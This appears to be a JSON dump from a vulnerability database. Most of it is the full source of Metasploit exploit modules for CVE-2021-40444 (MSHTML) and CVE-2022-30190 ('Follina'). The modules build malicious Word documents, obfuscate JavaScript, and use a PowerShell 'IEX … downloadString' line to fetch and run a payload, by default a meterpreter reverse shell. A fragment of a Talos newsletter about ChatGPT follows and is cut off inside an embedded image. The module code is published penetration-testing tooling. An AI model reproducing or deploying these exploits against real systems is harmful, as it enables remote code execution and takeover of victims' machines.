{4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder)\n cab_header << \"\\x00\\x00\" # uint16 {2} - Folder ID (starts at 0)\n cab_header << date # uint16 {2} - File Date (\\x5A\\x53)\n cab_header << time # uint16 {2} - File Time (\\xC3\\x5C)\n cab_header << \"\\x20\\x00\" # uint16 {2} - File Attributes\n cab_header << filename # byte {X} - Filename (ASCII)\n cab_header << \"\\x00\" # byte {1} - null Filename Terminator\n\n cab_stream = cab_header\n\n # CFDATA\n cab_stream << cab_cfdata\n end\n\n def generate_html\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab\"\n inf = \"#{File.basename(@my_resources.first)}.inf\"\n\n file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')\n js_content = ::File.binread(file_path)\n\n js_content.gsub!('REPLACE_INF', inf)\n js_content.gsub!('REPLACE_URI', uri)\n if datastore['OBFUSCATE']\n print_status('Obfuscate JavaScript content')\n\n js_content = Rex::Exploitation::JSObfu.new js_content\n js_content = js_content.obfuscate(memory_sensitive: false)\n end\n\n html = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>'\n html += js_content.to_s\n html += '</script></body></html>'\n html\n end\n\n def get_file_in_docx(fname)\n i = @docx.find_index { |item| item[:fname] == fname }\n\n unless i\n fail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\")\n end\n\n @docx.fetch(i)[:data]\n end\n\n def get_template_path\n datastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx')\n end\n\n def inject_docx\n document_xml = get_file_in_docx('word/document.xml')\n unless document_xml\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')\n end\n\n document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')\n unless document_xml_rels\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')\n end\n\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\"\n @docx.each do |entry|\n case entry[:fname]\n when 'word/document.xml'\n entry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s)\n when 'word/_rels/document.xml.rels'\n entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"mhtml:#{uri}!x-usc:#{uri}\")\n end\n end\n end\n\n def normalize_uri(*strs)\n new_str = strs * '/'\n\n new_str = new_str.gsub!('//', '/') while new_str.index('//')\n\n # makes sure there's a starting slash\n unless new_str[0, 1] == '/'\n new_str = '/' + new_str\n end\n\n new_str\n end\n\n def on_request_uri(cli, request)\n header_cab = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'application/octet-stream',\n 'Content-Disposition' => \"attachment; filename=#{File.basename(@my_resources.first)}.cab\"\n }\n\n header_html = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'text/html; charset=UTF-8'\n }\n\n if request.method.eql? 'HEAD'\n if request.raw_uri.to_s.end_with? '.cab'\n send_response(cli, '', header_cab)\n else\n send_response(cli, '', header_html)\n end\n elsif request.method.eql? 'OPTIONS'\n response = create_response(501, 'Unsupported Method')\n response['Content-Type'] = 'text/html'\n response.body = ''\n\n cli.send_response(response)\n elsif request.raw_uri.to_s.end_with? '.html'\n print_status('Sending HTML Payload')\n\n send_response_html(cli, generate_html, header_html)\n elsif request.raw_uri.to_s.end_with? '.cab'\n print_status('Sending CAB Payload')\n\n send_response(cli, create_cab(@dll_payload), header_cab)\n end\n end\n\n def pack_docx\n @docx.each do |entry|\n if entry[:data].is_a?(Nokogiri::XML::Document)\n entry[:data] = entry[:data].to_s\n end\n end\n\n Msf::Util::EXE.to_zip(@docx)\n end\n\n def unpack_docx(template_path)\n document = []\n\n Zip::File.open(template_path) do |entries|\n entries.each do |entry|\n if entry.name.match(/\\.xml|\\.rels$/i)\n content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?\n elsif entry.file?\n content = entry.get_input_stream.read\n end\n\n vprint_status(\"Parsing item from template: #{entry.name}\")\n\n document << { fname: entry.name, data: content }\n end\n end\n\n document\n end\n\n def primer\n print_status('CVE-2021-40444: Generate a malicious docx file')\n\n @proto = (datastore['SSL'] ? 'https' : 'http')\n if datastore['SRVHOST'] == '0.0.0.0'\n datastore['SRVHOST'] = Rex::Socket.source_address\n end\n\n template_path = get_template_path\n unless File.extname(template_path).match(/\\.docx$/i)\n fail_with(Failure::BadConfig, 'Template is not a docx file!')\n end\n\n print_status(\"Using template '#{template_path}'\")\n @docx = unpack_docx(template_path)\n\n print_status('Injecting payload in docx document')\n inject_docx\n\n print_status(\"Finalizing docx '#{datastore['FILENAME']}'\")\n file_create(pack_docx)\n\n @dll_payload = Msf::Util::EXE.to_win64pe_dll(\n framework,\n payload.encoded,\n {\n arch: payload.arch.first,\n mixed_mode: true,\n platform: 'win'\n }\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/word_mshtml_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-03T17:41:08", "description": "This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.\n", "cvss3": {}, "published": "2022-05-30T17:23:18", "type": "metasploit", "title": "Microsoft Office Word MSDTJS", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-25T21:10:59", "id": "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSDTJS_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/fileformat/word_msdtjs_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Post::File\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Office Word MSDTJS',\n 'Description' => %q{\n This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template\n feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.\n },\n 'References' => [\n ['CVE', '2022-30190'],\n ['URL', 'https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/'],\n ['URL', 'https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19'],\n ['URL', 'https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/'],\n ['URL', 'https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e'],\n ['URL', 'https://twitter.com/GossiTheDog/status/1531608245009367040'],\n ['URL', 'https://github.com/JMousqueton/PoC-CVE-2022-30190']\n ],\n 'Author' => [\n 'nao sec', # Original disclosure.\n 'mekhalleh (RAMELLA S\u00e9bastien)', # Zeop CyberSecurity\n 'bwatters-r7' # RTF support\n ],\n 'DisclosureDate' => '2022-05-29',\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'DefaultOptions' => {\n 'DisablePayloadHandler' => false,\n 'FILENAME' => 'msf.docx',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'SRVHOST' => Rex::Socket.source_address('1.2.3.4')\n },\n 'Targets' => [\n [ 'Microsoft Office Word', {} ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['Follina'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']),\n OptEnum.new('OUTPUT_FORMAT', [true, 'File format to use [docx, rtf].', 'docx', %w[docx rtf]]),\n OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])\n ])\n end\n\n def get_file_in_docx(fname)\n i = @docx.find_index { |item| item[:fname] == fname }\n\n unless i\n fail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\")\n end\n\n @docx.fetch(i)[:data]\n end\n\n def get_template_path\n datastore['CUSTOMTEMPLATE'] || File.join(Msf::Config.data_directory, 'exploits', 'word_msdtjs.docx')\n end\n\n def generate_html\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1\"\n\n dummy = ''\n (1..random_int(61, 100)).each do |_n|\n dummy += '//' + rand_text_alpha(100) + \"\\n\"\n end\n\n cmd = Rex::Text.encode_base64(\"IEX(New-Object Net.WebClient).downloadString('#{uri}')\")\n\n js_content = \"window.location.href = \\\"ms-msdt:/id PCWDiagnostic /skip force /param \\\\\\\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'#{cmd}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\\\\\\\"\\\";\"\n if datastore['OBFUSCATE']\n print_status('Obfuscate JavaScript content')\n\n js_content = Rex::Exploitation::JSObfu.new js_content\n js_content = js_content.obfuscate(memory_sensitive: false)\n end\n\n html = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>'\n html += \"\\n#{dummy}\\n#{js_content}\\n\"\n html += '</script></body></html>'\n\n html\n end\n\n def inject_docx\n document_xml = get_file_in_docx('word/document.xml')\n unless document_xml\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')\n end\n\n document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')\n unless document_xml_rels\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')\n end\n\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\"\n @docx.each do |entry|\n case entry[:fname]\n when 'word/_rels/document.xml.rels'\n entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"#{uri}&#x21;\")\n end\n end\n end\n\n def normalize_uri(*strs)\n new_str = strs * '/'\n\n new_str = new_str.gsub!('//', '/') while new_str.index('//')\n\n # makes sure there's a starting slash\n unless new_str.start_with?('/')\n new_str = '/' + new_str\n end\n\n new_str\n end\n\n def on_request_uri(cli, request)\n header_html = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'text/html; charset=UTF-8'\n }\n\n if request.method.eql? 'HEAD'\n send_response(cli, '', header_html)\n elsif request.method.eql? 'OPTIONS'\n response = create_response(501, 'Unsupported Method')\n response['Content-Type'] = 'text/html'\n response.body = ''\n\n cli.send_response(response)\n elsif request.raw_uri.to_s.end_with? '.html'\n print_status('Sending HTML Payload')\n\n send_response_html(cli, generate_html, header_html)\n elsif request.raw_uri.to_s.end_with? '.ps1'\n print_status('Sending PowerShell Payload')\n\n send_response(cli, @payload_data, header_html)\n end\n end\n\n def pack_docx\n @docx.each do |entry|\n if entry[:data].is_a?(Nokogiri::XML::Document)\n entry[:data] = entry[:data].to_s\n end\n end\n\n Msf::Util::EXE.to_zip(@docx)\n end\n\n def build_rtf\n print_status('Generating a malicious rtf file')\n\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\"\n uri_space = 76 # this includes the required null character\n uri_max = uri_space - 1\n if uri.length > uri_max\n fail_with(Failure::BadConfig, \"The total URI must be no more than #{uri_max} characters\")\n end\n # we need the hex string of the URI encoded as UTF-8 and UTF-16\n uri.force_encoding('utf-8')\n uri_utf8_hex = uri.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join\n uri_utf8_hex << '0' * ((uri_space * 2) - uri_utf8_hex.length)\n\n uri_utf16 = uri.encode('utf-16')\n # remove formatting char and convert to hex\n uri_utf16_hex = uri_utf16[1..].each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join\n uri_utf16_hex << '0' * ((uri_space * 4) - uri_utf16_hex.length)\n rtf_file_data = exploit_data('CVE-2022-30190', 'cve_2022_30190_rtf_template.rtf')\n rtf_file_data.gsub!('REPLACE_WITH_URI_STRING_ASCII', uri_utf8_hex)\n rtf_file_data.gsub!('REPLACE_WITH_URI_STRING_UTF16', uri_utf16_hex)\n rtf_file_data.gsub!('REPLACE_WITH_URI_STRING', uri)\n file_create(rtf_file_data)\n end\n\n def build_docx\n print_status('Generating a malicious docx file')\n\n template_path = get_template_path\n unless File.extname(template_path).downcase.end_with?('.docx')\n fail_with(Failure::BadConfig, 'Template is not a docx file!')\n end\n\n @docx = unpack_docx(template_path)\n print_status('Injecting payload in docx document')\n inject_docx\n print_status(\"Finalizing docx '#{datastore['FILENAME']}'\")\n file_create(pack_docx)\n end\n\n def primer\n @proto = (datastore['SSL'] ? 'https' : 'http')\n\n if datastore['OUTPUT_FORMAT'] == 'rtf'\n build_rtf\n else\n build_docx\n end\n @payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)\n super\n end\n\n def random_int(min, max)\n rand(max - min) + min\n end\n\n def unpack_docx(template_path)\n document = []\n\n Zip::File.open(template_path) do |entries|\n entries.each do |entry|\n if entry.name.downcase.end_with?('.xml', '.rels')\n content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?\n elsif entry.file?\n content = entry.get_input_stream.read\n end\n\n vprint_status(\"Parsing item from template: #{entry.name}\")\n\n document << { fname: entry.name, data: content }\n end\n end\n\n document\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/word_msdtjs_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2023-03-24T20:18:32", "description": "\n\nWelcome to this week&#x27;s edition of the Threat Source newsletter.\n\nThere is no shortage of [hyperbolic headlines](<https://www.businessinsider.com/chatgpt-jobs-at-risk-replacement-artificial-intelligence-ai-labor-trends-2023-02?ref=blog.talosintelligence.com>) about ChatGPT out there, everything from how it and other AI tools like it are here to replace all our jobs, make college essays a thing of the past and change the face of cybersecurity as we know it.\n\nIt&#x27;s the talk of SEO managers everywhere who can&#x27;t wait to find a way to work &quot;ChatGPT&quot; into a headline. And in the security community, everyone is concerned that AI models will help attackers get smarter, faster or more dangerous.\n\nThe biggest issue I&#x27;m seeing with that is these tools aren&#x27;t that smart.\n\nOther writers have done a [far more eloquent](<https://www.theatlantic.com/technology/archive/2022/12/chatgpt-openai-artificial-intelligence-writing-ethics/672386/?ref=blog.talosintelligence.com>) and interesting job than I can in a few dozen words here about [how bad these models are at writing creatively or interpreting human emotion](<https://www.vice.com/en/article/bvmk9m/everybody-please-calm-down-about-chatgpt?ref=blog.talosintelligence.com>), but I wanted to put my own spin on things with my incredibly niche interests and use case for ChatGPT.\n\nFirst, I asked it to help me write this newsletter. While it politely declined to do the whole thing for me because it can&#x27;t produce something on Talos&#x27; behalf, it did start to compile a list of &quot;the top stories we&#x27;re following this week.&quot;\n\n![Threat Source newsletter \\(March 9, 2023\\) \u2014 Stop freaking out about ChatGPT](data:image/png;base64,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